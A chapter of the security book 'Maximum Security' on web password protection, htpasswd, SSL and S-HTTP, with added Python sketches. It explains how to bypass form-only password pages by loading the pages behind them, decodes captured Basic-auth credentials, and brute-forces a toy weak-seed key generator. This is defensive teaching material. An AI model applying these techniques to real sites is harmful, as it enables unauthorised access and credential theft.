Maximum Security:

A Hacker's Guide to Protecting Your Internet Site and Network

30 Languages, Extensions, and Security

This chapter examines the relationship between languages, extensions, and security. Traditionally, the term language refers (in the computer world) to some form of computer language: a set of common instructions that, when properly assembled, create a program or application. Most users are well aware of at least one computer language: BASIC, Pascal, FORTRAN, C, C++, and so on. Such languages are traditionally understood to be real languages because one can construct a program with them that can thereafter run generally without need of external support from an interpreter.

Language

So much for tradition. Today, the climate is different. For example, the popularity of shell languages, which are used primarily on the UNIX platform, has greatly increased. They are written in a syntax that meets the requirements of the shell or command interpreter of the given platform. These languages cannot create entirely standalone programs that execute without a command interpreter, yet these languages have become vastly popular. A programmer who can proficiently program in such a language is almost guaranteed to land a job somewhere.

NOTE: For MS-DOS and Windows users who have never worked on a UNIX platform: Shell language programs can be likened to large batch files. They are composed of various regular expression operations, pipes, re-directs, system calls, and so forth.

As such, these languages stretch the definition of language itself. For even though these programs cannot run without assistance from the underlying system, they are indeed full-fledged programs that can and often do run various services and functions on the Internet.

Similarly, there are interpreted languages such as Perl that offer extreme power to the user. These can often interface not just with their own interpreter, but with various shell languages and system calls. They can even be nested within other language constructs. A typical example would be a Perl script nested within a TCL script or within a C program. These are bona fide languages that cross the barriers (or perhaps bridge the gaps) between one or more real languages.

But where does the definition of language stop? For example, Hypertext Markup Language (HTML) is a language, even though it is completely useless unless interpreted by a hypertext reader (Navigator, Internet Explorer, Grail, Arena, Lynx, Opera, Powerbrowser, Netcruiser, and so forth). True, HTML is a language, but its application is limited (PostScript stands in a similar light).

JavaScript and VBScript are languages that actually stand squarely between Perl and HTML. JavaScript and VBScript perform only a limited set of tasks. They are designed to be interpreted by the browser, true, but unlike HTML, these languages perform tasks dynamically (examples include getting and processing variables to perform a calculation or other process). It is likely that in order to create a fully functional and dynamic Web-page environment, you will use a combination of languages.

That said, for the purpose of this chapter, a language is any set of instructions that can perform more than simple display processes, dynamically and without user intervention (that is, any set of instructions that could potentially automate a task).

Extensions

In contrast, an extension is any set of instructions, declarations, or statements that formulate one application of a particular language. Extensions are elements of (or designed to enhance) a particular language. Most commonly, the term extensions refers to HTML extensions, the majority of which are proprietary.

For example, consider the use of tables in HTML. Tables are extensions. They are statements that alter the face of a Web page. The use of tables is becoming more common because tables provide near-pixel-perfect control of the Web page's appearance. Extremely high-end Web development packages use tables to offer almost word-processor control of your Web page's look and feel. Fusion by NetObjects is an example of this phenomenon. In a WYSIWYG environment, the user can place pictures, text, sound, or video anywhere on the page. Tables mathematically plot out the location. The final result is accomplished by using invisible table structures that surround the object in question, thus giving the appearance of free-form location of the object. Fusion by NetObjects is often referred to as the "PageMaker of the WWW."

Perhaps the easiest way to grasp the concept of extensions is to understand that they are statements that extend the originally intended implementation of HTML. These are new features, often proposed by proprietary entities such as Netscape or Microsoft. Most extensions are designed to enhance the surfer's experience by offering more dynamic visual or multimedia content. These are proprietary and only work in browsers designed to read them.

HTML

On the surface, it sounds silly. HTML is a non-dynamic language that cannot serve a purpose unless read by a browser. How could it possibly have security implications? Well, it does. To understand why and what measures are being undertaken to address those implications, consider the original idea behind HTML. The intended purpose was to provide a platform-independent method of distributing data. It so happens that this original implementation was intended for use with plain (clear) text. At its most simple, then, a Web page consists of clear text. Examine the following HTML code:

<HTML>
<HEAD>
</HEAD>
<BODY>
<P >This is a page</P>
</BODY>
</HTML>

Pretty simple stuff. This HTML does no more than print a page that says This is a page. No extensions are used; the page would be boring. However, we could add an extension to change the background color to white:

<HTML>
<HEAD>
</HEAD>
<BODY bgcolor = "#ffffff">
<P >This is a page.</P>
</BODY>
</HTML>

The <BODY> tag sets the color. There are dozens of other tags we could use to add sound, animation, video, and so forth. However, all these still appear in clear text. Likewise, when you submit information in an HTML form, it is generally accepted (and parsed by a Perl program or other CGI application) in clear text.

When the WWW was used primarily for research and education, that was fine. The material could be intercepted across a network, but there was a relatively low risk of this actually occurring. However, time passed, and eventually people became concerned. Extensions were added to the HTML specification, including a password field. This field is called by issuing the following statement within a form:

<INPUT TYPE=PASSWORD>

This tag produces an input field that does not echo the password to the screen. Instead, characters of the password are represented by asterisks. Unfortunately, this field does very little to enhance real security.

First, the main concern is not whether someone standing over the shoulder of the user can see the password, but whether someone intercepting traffic can. This password field does little to prevent that. Moreover, the password field (which is used by thousands of sites all over the world) does absolutely nothing to prevent someone from entering the so-called protected site.
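To make the interception concern concrete, here is a minimal Python sketch (not part of the original text) of what a browser sends when a plain HTML form is submitted. The field names `user` and `password` and their values are hypothetical; the point is only that the password field's contents travel in the request body exactly as typed.

```python
from urllib.parse import urlencode, parse_qs

def build_form_body(fields):
    """Encode form fields the way a browser does for a plain HTML form POST."""
    return urlencode(fields)

def read_form_body(body):
    """Decode the body as a CGI program (or an eavesdropper) would."""
    return {name: values[0] for name, values in parse_qs(body).items()}

# Hypothetical field names and values, for illustration only.
body = build_form_body({"user": "alice", "password": "opensesame"})
recovered = read_form_body(body)
```

The asterisks shown on screen never reach the wire: anyone who captures `body` can read the password without any decoding effort.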

True, average users--when confronted with a page so protected--shy away and assume that if they don't have a password, they cannot get in. However, to anyone with even minimal knowledge of HTML implementation, this is the modern equivalent of a "Beware of Dog" or "Keep Off the Grass" sign. By venturing into the directory structure of the target server, any user can bypass this so-called security measure.

For example, suppose the password-protected site's address was this:

http://www.bogus_password_protection.com/~mypage

When a user lands on this page, he or she is confronted by a field that asks for a password. If the incorrect password is entered, a page (perhaps www.bogus_password_protection.com/~mypage/wrong.html) is fed to the user to inform him or her of the authentication failure. On the other hand, if the user enters a correct password, he or she is forwarded to a page of favorite links, funny jokes, or whatever (for example, www.bogus_password_protection.com/~mypage/jokes).

Using any garden-variety search engine, one can quickly identify the pages beneath the password page. This is done by issuing an explicit, case-sensitive, exact-match search string that contains the base address, or the address where the HTML documents for that user begin (in this case, http://www.bogus_password_protection.com/~mypage). The return will be a list of pages that are linked to that page. Naturally, the site's designer will include a Home button or link on each subsequent page. This way, users can navigate through the site comfortably.

By opening the location of all subsequent pages on that site, the user can bypass the password protection of the page. He or she can directly load all the pages that are loaded after a user provides the correct password. The only time that this technique will not work is when the password field is tied to a password routine that dynamically generates the next page (for example, a Perl script might compare the password to a list and, if the password is good, a subsequent page is compiled with time-sensitive information pulled from other variables, such as a "tip of the day" page).

TIP: Such implementations are the only valid instance in which to use this password field. In other words, you use the field to obscure the password to passers-by and point that form to a script on the server's local drive. All comparisons and other operations are done within the confines of that script, which also resides in a protected directory.
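The server-side arrangement described in the tip can be sketched as follows. This is a minimal illustration in Python rather than Perl, under stated assumptions: the credential table `KNOWN_PASSWORDS`, the function name `render_page`, and the page text are all hypothetical, and a real script would keep its credentials in a protected file rather than in the source.

```python
import hmac
from html import escape

# Hypothetical credential table; a real script would read this from a
# protected file outside the document tree.
KNOWN_PASSWORDS = {"alice": "opensesame"}

FAILURE_PAGE = "<P>Authorization failed.</P>"

def render_page(user, password, tip_of_the_day):
    """Return the protected page only if the password matches."""
    expected = KNOWN_PASSWORDS.get(user)
    if expected is None:
        return FAILURE_PAGE
    # compare_digest avoids leaking how many leading characters matched.
    if not hmac.compare_digest(expected.encode(), password.encode()):
        return FAILURE_PAGE
    # The page is compiled at request time, so there is no static URL
    # that a visitor could load directly to skip the check.
    return f"<P>Welcome, {escape(user)}. Tip of the day: {escape(tip_of_the_day)}</P>"
```

Because the protected content exists only as the output of this routine, opening a subsequent page's location directly gets the visitor nowhere.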

This brings us to one of the most commonly asked questions: How does one effectively password protect a site?

Password Protection for Web Sites: `htpasswd`

Password protection is accomplished with any implementation of htpasswd. This program (which comes stock with most Web server distributions) is designed to provide real password authentication. You will know when you land on a site using htpasswd because a dialog box demanding a password from the user is immediately issued. In Netscape, that dialog box appears much like the image in Figure 30.1.

FIGURE 30.1.
The htpasswd prompt.

Those using Mosaic for the X Window System will see a slightly different prompt (see Figure 30.2).

FIGURE 30.2.
The htpasswd prompt in Mosaic for X.

If the user enters the correct password, he or she will be referred to the next page in sequence. However, if the user fails to provide the correct password, he or she will be forwarded to a page that looks very similar to the one shown in Figure 30.3.

FIGURE 30.3.
The htpasswd failed authorization screen.

As authentication schemes go, htpasswd is considered fairly strong. It relies on the basic HTTP authentication scheme, but will also conform to MD5.

CAUTION: Be careful about setting the option for MD5. Not all browsers support this option, and your users may end up quite frustrated due to a failure to authenticate them. Known supported browsers currently include Mosaic, NCSA, and Spyglass.

A word to the wise: although the passwords of users are ultimately stored in encrypted form, the password is not passed in encrypted form in basic HTTP authentication. As reported by NCSA in the Mosaic User Authentication Tutorial:

In Basic HTTP Authentication, the password is passed over the network not encrypted but not as plain text--it is "uuencoded." Anyone watching packet traffic on the network will not see the password in the clear, but the password will be easily decoded by anyone who happens to catch the right network packet.

Cross Reference: Find the Mosaic User Authentication Tutorial on the Web at http://hoohoo.ncsa.uiuc.edu/docs-1.5/tutorials/user.html.
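How easily the password is decoded can be shown in a few lines. The sketch below assumes the encoding is Base64, which is what the basic HTTP authentication scheme uses in practice (the tutorial's "uuencoded" describes the same idea). The function names are my own, and the credentials are the familiar example pair from the HTTP authentication specification.

```python
import base64

def basic_auth_header(username, password):
    """Build the value a browser sends in the Authorization header."""
    token = base64.b64encode(f"{username}:{password}".encode()).decode("ascii")
    return f"Basic {token}"

def decode_basic_auth(header_value):
    """Recover (username, password) from a captured header value."""
    scheme, token = header_value.split(" ", 1)
    if scheme.lower() != "basic":
        raise ValueError("not a Basic credential")
    username, password = base64.b64decode(token).decode().split(":", 1)
    return username, password

header = basic_auth_header("Aladdin", "open sesame")
```

No key or secret is involved in `decode_basic_auth`; the encoding hides the password from a casual glance and nothing more.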

This is different from the MD5 implementation. As reported by the same document:

In MD5 Message Digest Authentication, the password is not passed over the network at all. Instead, a series of numbers is generated based on the password and other information about the request, and these numbers are then hashed using MD5. The resulting "digest" is then sent over the network, and it is combined with other items on the server to test against the saved digest on the server.

It is my opinion that in intranets or other networked environments where you can be sure of what browser is being used, you should implement the MD5 authentication scheme.
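The digest computation can be sketched as below. This is an illustration under an assumption: it follows the form later standardized for HTTP Digest authentication without the optional extensions, and the NCSA implementation of the day may differ in detail. The function names and the sample values are hypothetical.

```python
import hashlib

def md5_hex(text):
    """Return the MD5 digest of a string as 32 hexadecimal characters."""
    return hashlib.md5(text.encode()).hexdigest()

def digest_response(username, realm, password, method, uri, nonce):
    """Compute the value sent in place of the password."""
    ha1 = md5_hex(f"{username}:{realm}:{password}")  # identity and secret
    ha2 = md5_hex(f"{method}:{uri}")                 # what is being requested
    # The server-supplied nonce ties the response to this one exchange.
    return md5_hex(f"{ha1}:{nonce}:{ha2}")

# Hypothetical values for illustration.
first = digest_response("alice", "ByPassword", "opensesame", "GET", "/private/", "abc123")
second = digest_response("alice", "ByPassword", "opensesame", "GET", "/private/", "def456")
```

Because the nonce changes between exchanges, a captured response cannot simply be replayed against a fresh challenge, and the password itself never appears on the wire.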

Who Can Use htpasswd?

Anyone can use htpasswd to password protect any directory within his or her directory tree. That is, a system administrator can protect an entire Web site, or a user can selectively password protect directories within his or her /~user hierarchy. However, there are some practical obstacles. First, the program must be available for you to use. That means the following:

The machine on which the site resides must be a UNIX box.
The administrator there must have gotten htpasswd with the distribution of his or her Web-server kit (NCSA; Apache also supports this utility).
The administrator must have compiled the source to a binary or otherwise obtained a binary. You may go to the directory and find that only the source is available and the permissions are set to root as well.

Check whether all these conditions are met. You can generally find the location of htpasswd (without bothering your sysad) by issuing the whereis command at a shell prompt. However, htpasswd is usually located in the /usr/local/etc/httpd/support directory.

TIP: Your PATH environment variable is probably not set to reflect that directory, and I would not bother to change it. You will only be using the program once or twice unless you are engaged in system administration.
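The same search can be scripted. The sketch below is a hypothetical helper, not a standard tool: it looks on the current PATH first and then falls back to the support directory named above, which may well differ on your server.

```python
import os
import shutil

# Directory named in the text; other installations may differ.
DEFAULT_SUPPORT_DIR = "/usr/local/etc/httpd/support"

def find_htpasswd(extra_dirs=(DEFAULT_SUPPORT_DIR,)):
    """Return the path to an executable htpasswd, or None if none is found."""
    found = shutil.which("htpasswd")  # search the PATH first
    if found:
        return found
    for directory in extra_dirs:
        candidate = os.path.join(directory, "htpasswd")
        # A source-only directory fails this test: no executable binary.
        if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            return candidate
    return None
```

A result of `None` means one of the conditions listed earlier is not met: either the binary was never built or it is not accessible to you.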

What if My Sysad Doesn't Have htpasswd and Won't Get It?

Some system administrators can be difficult to get hold of, or may simply ignore user requests for the htpasswd utility. If you encounter this situation, there is an alternative: htpasswd.pl. htpasswd.pl is a Perl script designed to replace the current implementation of htpasswd. It was written by Ryun Whitfield Schlecht (also known as Nem), a 22-year-old Computer Science major at North Dakota State University.

Cross Reference: You can find Nem at http://abattoir.cc.ndsu.nodak.edu/~nem/. The code for htpasswd.pl is located at http://abattoir.cc.ndsu.nodak.edu/~nem/perl/htpass.html.

Using htpasswd

Implementing htpasswd takes only a few seconds. The first step is to create a file named .htaccess in the target directory. This is a plain-text dot file that can be edited with any editor on the UNIX platform (I prefer vi). The contents of the file will appear as follows:

AuthUserFile /directory_containing_.htpasswd/.htpasswd
AuthGroupFile /directory_containing_a_group_file
AuthName ByPassword
AuthType Basic

<Limit GET>
require user _some_username_here
</Limit>

Let's go through each line:

The first line specifies the AuthUserFile. This is where the actual passwords are stored, in a file named .htpasswd (I will address the construct of that file momentarily).
The second line specifies the location of the group file (called .htgroup). This is where usernames can be categorized into groups. In this example, we will not use a group file because we do not have many groups.
The third and fourth lines express the way in which the password will be authenticated. (The technique being used is basic HTTP authentication because not all browsers support MD5.)
The fifth, sixth, and seventh lines express which users are allowed to perform a GET operation on the directory (that is, which users are allowed to access that directory). This is where you put the username.

TIP: All paths should be expressed in their absolute form. That is, the entire path should be expressed. If you fail to do so, the authentication routine will fail.
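Because a relative path is such an easy mistake to make, it can be worth checking the file before relying on it. The following is a small hypothetical checker, not part of any Web server distribution; it inspects only the two path-bearing directives used in the example above, and the sample paths are invented.

```python
import posixpath

# Directives from the example .htaccess file that take a file path.
PATH_DIRECTIVES = ("AuthUserFile", "AuthGroupFile")

def relative_auth_paths(htaccess_text):
    """Return (directive, path) pairs whose path is not absolute."""
    problems = []
    for line in htaccess_text.splitlines():
        parts = line.split(None, 1)  # directive name, then the rest of the line
        if len(parts) == 2 and parts[0] in PATH_DIRECTIVES:
            path = parts[1].strip()
            if not posixpath.isabs(path):
                problems.append((parts[0], path))
    return problems

# Hypothetical file contents for illustration.
good = "AuthUserFile /home/user/secure/.htpasswd\nAuthName ByPassword\nAuthType Basic\n"
bad = "AuthUserFile secure/.htpasswd\nAuthType Basic\n"
```

An empty list means every path found was absolute; anything else names the directive to fix.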

Next, you will create the .htpasswd file. This file is a special file; it can be created with a regular editor, but I would advise against it. Instead, use your version of htpasswd like so:

htpasswd -c /directory_containing_htpasswd/.htpasswd username

This will create the file and prompt you for a password for the username. You will have to type this password twice: once to set it and once to confirm it.

CAUTION: Make certain you have created the .htpasswd file in the same directory as you indicated in the .htaccess file. Otherwise, the system will be unable to find the .htpasswd file and, no matter what password is entered, users from outside will meet with a failed authorization.

If you examine the .htpasswd file after you finish, you will see that it contains the username and an encrypted string, which is the password in encrypted form. It will look something like this:

username:o3ds2xcqWzLP7

At this point, the directory is password protected. Anyone landing on that page will be confronted with a password dialog box.
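The structure of an entry in the .htpasswd file is simple enough to take apart by hand. The sketch below assumes the stored string is a traditional 13-character crypt(3) hash, in which the first two characters are the salt; that assumption fits the sample entry shown above but is not stated in the text, and the function names are my own.

```python
def parse_htpasswd_line(line):
    """Split one .htpasswd entry into (username, stored_hash)."""
    username, _, stored = line.partition(":")
    if not username.strip() or not stored.strip():
        raise ValueError("not a username:hash entry")
    return username.strip(), stored.strip()

def crypt_salt(stored_hash):
    """Return the salt, assuming a traditional 13-character crypt(3) hash."""
    if len(stored_hash) != 13:
        raise ValueError("not a traditional crypt(3) hash")
    return stored_hash[:2]

user, stored = parse_htpasswd_line("username:o3ds2xcqWzLP7")
salt = crypt_salt(stored)
```

The salt is stored in the open by design; it is the remaining characters that cannot practically be turned back into the password, which is why the file is safer to create with htpasswd than by hand.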

If you do not have Telnet access, you really cannot perform the preceding operation. If your provider has denied Telnet access, explain the situation; perhaps it can offer you Telnet on a limited basis so you can set the htpasswd. I would not use a provider that did not offer Telnet access, but there are many out there.

CAUTION: In the past, I have seen users attempt to set up these files--without Telnet--using FTP clients. Do NOT try this, or you will be unable to access your page later. After these files exist in your directory, the dialog box will appear every time. You would then have to return to FTP and delete the files. However, depending on how the permissions were set, you might be unable to do so. If you do not have access to Telnet and know very little about UNIX, do NOT attempt to establish such files on your server's drive.

HTML Security Extensions

I mentioned several security extensions to HTML earlier in this book. Now it's time to get a bit more specific, examining each in turn.

Because the Web has now become a popular medium for commerce, there is an enormous push for security in HTML. Because the majority of garden-variety HTML traffic is in clear text, the development of cryptographic and other data-hiding techniques has become a big business. Thus, most of the proposals are proprietary. I will address two: the Secure Sockets Layer (SSL) and S-HTTP.

Secure Sockets Layer (Netscape)

Secure Sockets Layer (SSL) is a system designed and proposed by Netscape Communications Corporation. The SSL protocol supports a wide range of authentication schemes. These can be implemented using various cryptographic algorithms, including the now-popular DES. As reported by Netscape, in its specification of SSL:

The primary goal of the SSL Protocol is to provide privacy and reliability between two communicating applications. The protocol is composed of two layers. At the lowest level, layered on top of some reliable transport protocol (e.g., TCP[TCP]), is the SSL Record Protocol. The SSL Record Protocol is used for encapsulation of various higher level protocols. One such encapsulated protocol, the SSL Handshake Protocol, allows the server and client to authenticate each other and to negotiate an encryption algorithm and cryptographic keys before the application protocol transmits or receives its first byte of data.
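The layering described in the specification can be seen in how a client program is written. The sketch below uses Python's standard `ssl` module, which implements TLS, the successor to SSL, so it illustrates the same structure rather than Netscape's original protocol. The function names are hypothetical, and no host is contacted until `fetch_negotiated_parameters` is called with a host of your choosing.

```python
import socket
import ssl

def make_client_context():
    """Build a context that verifies the server's certificate and host name."""
    return ssl.create_default_context()

def fetch_negotiated_parameters(host, port=443, timeout=10):
    """Open TCP, run the handshake on top of it, and report what was negotiated."""
    context = make_client_context()
    # Lowest layer: an ordinary reliable TCP connection.
    with socket.create_connection((host, port), timeout=timeout) as tcp:
        # The handshake completes inside wrap_socket, before the
        # application protocol sends or receives its first byte.
        with context.wrap_socket(tcp, server_hostname=host) as secured:
            return secured.version(), secured.cipher()
```

Only after `wrap_socket` returns would an application protocol such as HTTP begin to speak, and everything it sends then passes through the record layer.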

SSL has been characterized as extremely secure, primarily because the connection security also incorporates the use of MD5. The protocol therefore provides connection integrity as well as authentication. The design of SSL has been deemed sufficiently secure that very powerful software firms have incorporated the technology into their products. One such product is Microsoft's Internet Information Server.

NOTE: Microsoft's early implementation of SSL required that you obtain a certificate from a third party, in this case VeriSign. This certificate verified your identity, a contingency that not everyone is happy about.

SSL was unveiled to the world and largely accepted by security circles, primarily because the system combined some of the most powerful encryption techniques currently available. But the bright future of SSL soon met with dark and stormy skies. The implementation initially introduced by Netscape Communications Corporation simply wasn't strong enough. On September 19, 1995, news that SSL had been cracked was plastered across the national headlines. As John Markoff noted in his article "Security Flaw Is Discovered In Software Used In Shopping," which appeared in The New York Times on September 19, 1995:

A serious security flaw has been discovered in Netscape, the most popular software used for computer transactions over the Internet's World Wide Web, threatening to cast a chill over the emerging market for electronic commerce...The flaw, which could enable a knowledgeable criminal to use a computer to break Netscape's security coding system in less than a minute, means that no one using the software can be certain of protecting credit card information, bank account numbers or other types of information that Netscape is supposed to keep private during online transactions.

Several students (including Ian Goldberg and David Wagner) found that within minutes, they could discover the key used in the encryption process. This (for a time, at least) rendered SSL utterly useless for serious security.

Cross Reference: C source code has been posted to the Internet that you can use to attack the early, flawed implementations of SSL. You can get that source at http://hplyot.obspm.fr:80/~dl/netscapesec/unssl.c.

The flaw is best expressed by the Netscape advisory ("Potential Vulnerability in Netscape Products") issued shortly after the story broke:

Current versions of Netscape Navigator use random information to generate session encryption keys of either 40 or 128 bits in length. The random information is found through a variety of functions that look into a user's machine for information about how many processes are running, process ID numbers, the current time in microseconds, etc. The current vulnerability exists because the size of random input is less than the size of the subsequent keys. This means that instead of searching through all the 2^128 possible keys by brute force, a potential intruder only has to search through a significantly smaller key space by brute force. This is substantially easier problem to solve because it takes much less compute time and means 40-bit or 128-bit key strength is substantially reduced.

Cross Reference: "Potential Vulnerability in Netscape Products" can be found on the Web at http://www.netscape.com/newsref/std/random_seed_security.html.
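The advisory's point about key space can be illustrated with a toy model. The sketch below is emphatically not Netscape's algorithm: it is a hypothetical key generator that derives a 128-bit key from the kinds of inputs the advisory mentions (the time and a process ID), followed by the brute-force search that such a design invites. The count of 32,768 possible process IDs used in the arithmetic is likewise an assumption.

```python
import hashlib
import math

def toy_session_key(seconds, microseconds, pid):
    """Derive a 128-bit key from guessable inputs (toy model only)."""
    seed = f"{seconds}:{microseconds}:{pid}".encode()
    return hashlib.md5(seed).digest()

def recover_seed(target_key, seconds, usec_range, pid_range):
    """Try every candidate seed until one reproduces the observed key."""
    for pid in pid_range:
        for usec in usec_range:
            if toy_session_key(seconds, usec, pid) == target_key:
                return usec, pid
    return None

def search_space_bits(usec_count, pid_count):
    """Effective key strength, in bits, when only the seed must be guessed."""
    return math.log2(usec_count * pid_count)

# The attacker is assumed to know the second in which the key was made.
key = toy_session_key(811468800, 4242, 137)
found = recover_seed(key, 811468800, range(5000), range(130, 140))
```

In this model, one million possible microsecond values and 32,768 process IDs give a search space of about 35 bits, no matter that the key itself is 128 bits long. That is the sense in which the size of the random input, not the size of the key, sets the real strength.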

As Netscape was quick to point out, there has never been a known instance of any Net surfer's financial information being stolen in such a manner. Nor have there been any recorded instances of such information being intercepted over the Internet. At the day's end, the technique employed was complex and not one that would be commonly known to criminals. However, the episode threw many products into a suspicious light, and again, Internet security was reduced to a hope rather than a reality.

Information now suggests that peripheral components used in implementation of SSL may even be flawed. Specifically, MD5 is now under suspicion. On May 2, 1996, a member of the German Information Security Agency issued a report titled "Cryptanalysis of MD5 Compress." In it, the author demonstrates a weakness inherent in MD5.

Cross Reference: "Cryptanalysis of MD5 Compress" by Dr. Hans Dobbertin can be found at http://www.cs.ucsd.edu/users/bsy/dobbertin.ps.

Cross Reference: Some forces in encryption suggest that MD5 be phased out. To learn more about these matters, check out the Secure Sockets Layer Discussion List. In this mailing list, members discuss the various security characteristics of SSL. You can subscribe to that list by sending a mail message to ssl-talk-request@netscape.com. The mail message should be empty, and the Subject line should include the word SUBSCRIBE. The material discussed in the Secure Sockets Layer Discussion List is quite technical. If you are new to the subject matter, it would be wise to obtain the FAQ (http://www.consensus.com/security/ssl-talk-sec01.html).

Today, a stronger version of SSL is spreading like wildfire. To date, there have been no successful attempts to crack these newer implementations; they have a much stronger random-generation routine. Dozens of third-party products now support SSL, including most of the browser clients commercially available (and a good number of servers).

Cross Reference: An interesting comparison of third-party products that support SSL is available at http://webcompare.iworld.com/compare/security.shtml.

S-HTTP

S-HTTP (Secure Hypertext Transfer Protocol) differs from SSL in several ways. First, Netscape's SSL is a published implementation; therefore, there is a wide range of information available about it. In contrast, S-HTTP is an often-discussed but seldom-seen protocol.

The main body of information about S-HTTP is in the "Internet Draft" authored by E. Rescorla and A. Schiffman of Enterprise Integration Technologies (Eit.com). Immediately on examining that document, you can see that S-HTTP is implemented in an entirely different manner from SSL. For a start, S-HTTP works at the application level of TCP/IP communications, whereas SSL works at the data-transport level.

As you learned in Chapter 6, "A Brief Primer on TCP/IP," these levels represent different phases of the TCP/IP stack implementation. Application-level exchanges are those available to (and viewable by) the operator. Well-known application-level protocols include FTP, Telnet, HTTP, and so on.

A company called Terisa Systems (www.terisa.com) licenses several development toolkits that incorporate S-HTTP into applications. These toolkits come with pre-fabbed libraries and a crypto engine from RSA.

S-HTTP's main feature (and one that is very attractive) is that it does not require users to engage in a public key exchange. Remember how I wrote about Microsoft's implementation of SSL, which required that you obtain a certificate? This means you have to identify yourself to a third party. In contrast, according to Rescorla and Schiffman:

S-HTTP does not require client-side public key certificates (or public keys), supporting symmetric session key operation modes. This is significant because it means that spontaneous private transactions can occur without requiring individual users to have an established public key.

Cross Reference: You can find "The Secure HyperText Transfer Protocol" by E. Rescorla and A. Schiffman on the Web at http://www.eit.com/creations/s-http/draft-ietf-wts-shttp-00.txt.

In my view, this seems more acceptable and less Orwellian. There should never be an instance where an individual MUST identify himself or herself simply to make a purchase or cruise a page, just as one should not have to identify oneself at a bookstore or a supermarket in the "real" world. One has to question the motivation of corporations such as Microsoft that insist on certificates and public key schemes. Why are they so concerned that we identify ourselves? I would view any such scheme with extreme suspicion. In fact, I would personally lobby against such schemes before they become acceptable Internet standards. Many other efforts in electronic commerce are aimed toward complete anonymity of the client and consumer. These efforts seem to be working out nicely, without need for such rigid identification schemes.

Moreover, S-HTTP may be a more realistic choice. Even if public key exchange systems were desirable (as opposed to anonymous transactions), the number of Internet users with a public key is small. New users in particular are more likely targets for online commercial transactions, and the majority of these individuals do not even know that public key systems exist. If a public key is required to complete a transaction using a secure protocol, many millions of people will be unable to trade. It seems highly unrealistic that vendors will suggest methods of educating (or prodding) consumers into obtaining a public key.

NOTE: Although S-HTTP does not require public key exchange-style authentication, it supports such authentication. It also supports Kerberos authentication, which is an additional benefit.

S-HTTP also supports message authentication and integrity in much the same fashion as SSL. As noted in "The Secure HyperText Transfer Protocol":

Secure HTTP provides a means to verify message integrity and sender authenticity for a HTTP message via the computation of a Message Authentication Code (MAC), computed as a keyed hash over the document using a shared secret--which could potentially have been arranged in a number of ways, e.g.: manual arrangement or Kerberos. This technique requires neither the use of public key cryptography nor encryption.
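The idea of a keyed hash over a document can be sketched briefly. The example below uses HMAC with SHA-256 from Python's standard library as a stand-in; the draft's own MAC construction and hash algorithm may differ, and the function names, secret, and document are hypothetical.

```python
import hashlib
import hmac

def make_mac(shared_secret, document):
    """Compute a keyed hash over the document using the shared secret."""
    return hmac.new(shared_secret, document, hashlib.sha256).hexdigest()

def verify_mac(shared_secret, document, received_mac):
    """Check that the document is intact and came from a holder of the secret."""
    expected = make_mac(shared_secret, document)
    return hmac.compare_digest(expected, received_mac)

# Hypothetical secret, arranged out of band (manually, for instance).
secret = b"arranged-in-advance"
document = b"Ship 3 copies to the usual address."
mac = make_mac(secret, document)
```

Note that the document itself travels unencrypted here. The MAC proves integrity and origin without hiding anything, which is exactly the distinction the draft draws.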

To date, not enough public information about S-HTTP is available for me to formulate a truly educated advisory. However, it seems clear that the designers integrated some of the best elements of SSL while allowing for maximum privacy of client users. Also, I am aware of no instance in which S-HTTP has been cracked, but this may be because the cracking communities have not taken as lively an interest in S-HTTP as they have Netscape. No one can say for certain.

HTML in General

The problems with Web security that stem from HTML are mainly those that involve the traffic of data. In other words, the main concern is whether information can be intercepted over the Internet. Because commerce on the Internet is becoming more common, these issues will continue to be a matter of public concern.

As it currently stands, very few sites actually use secure HTML technology. When was the last time you landed on a page that used this technology? (You can recognize such pages because the little key in the left corner of Netscape Navigator is solid as opposed to broken.) This, of course, depends partly on what sites you visit on the WWW. If you spend your time exclusively at sites that engage in commerce, you are likely to see more of this activity. However, even sampling 100 commerce sites, the number of those using secure HTTP technology is small.

Java and JavaScript

Java and JavaScript are two entirely different things, but they are often confused by nonprogrammers as being one and the same. Here's an explanation of each:

JavaScript is a scripting language created at Netscape Communications Corporation. It is designed for use inside the Netscape Navigator environment (and other supported browsers). It is not a compiled language, it does not use class libraries, and it is generally nested within HTML. In other words, you can generally see JavaScript source by examining the source code of an HTML document. The exception to this is when the JavaScript routine is contained within a file and the HTML points to that source. Standalone applications cannot be developed with JavaScript, but very complex programs can be constructed that will run within the Netscape Navigator environment (and other supported browsers).
Java, developed by Sun Microsystems, is a real, full-fledged, object-oriented, platform-independent, interpreted language. Java code requires a Java interpreter to be present on the target machine and its code is not nested. Java can be used to generate completely standalone programs. Java is very similar in construct to C++.

JavaScript is far more easily learned by a non-programmer; it can be learned by almost anyone. Moreover, because Netscape Navigator and supported browsers already contain an interpreter, JavaScript functions can be seen by a much wider range of users. Java, in contrast, is to some degree dependent on class files and therefore has a greater overhead. Also, Java applications require a real Java runtime environment, a feature that many Netizens do not currently possess (users of Lynx, for example). Finally, Java applets take far more memory to run than do JavaScript functions; although, to be fair, badly written JavaScript functions can recursively soak up memory each time the originating page is reloaded. This can sometimes lead to a crash of the browser, even if the programmer had no malicious intent.

Of these two languages, Java is far more powerful. In fact, Java is just as powerful as its distant cousin, C++. Whole applications have been written in Java. HotJava, the famous browser from Sun Microsystems, is one example. Because Java is more powerful, it is also more dangerous from a security standpoint.

Java

When Java was released, it ran through the Internet like a shockwave. Programmers were enthralled by the prospect of a platform-independent language, and with good reason. Developing cross-platform applications is a complex process that requires a lot of expense. For example, after writing a program in C++ for the Microsoft Windows environment, a programmer faces a formidable task in porting that application to UNIX.

Special tools have been developed for this process, but the cost of such engines is often staggering, especially for the small outfit. Many of these products cost more than $5,000 for a single user license. Moreover, no matter what conversion vendors may claim about their products, the porting process is never perfect. How can it be? In anything more than a trivial application, the inherent differences between X and Windows 95, for example, are substantial indeed. Quite frequently, further human hacking must be done to make a smooth transition to the targeted platform.

With these factors in mind, Java was a wonderful step forward in the development of cross-platform applications. Even more importantly, Java was designed (perhaps not initially, but ultimately) with components specifically for development of platform-independent applications for use on the Internet. From this, we can deduce the following: Java was a revolutionary step in Internet-based development (particularly that type of development that incorporates multimedia and living, breathing applications with animation, sound, and graphics). It is unfortunate that Java had such serious security flaws.

I'd like to explain the process of how Java became such a terrific security issue on the Internet. This may help you understand the concept of how security holes in one language can affect the entire Net community.

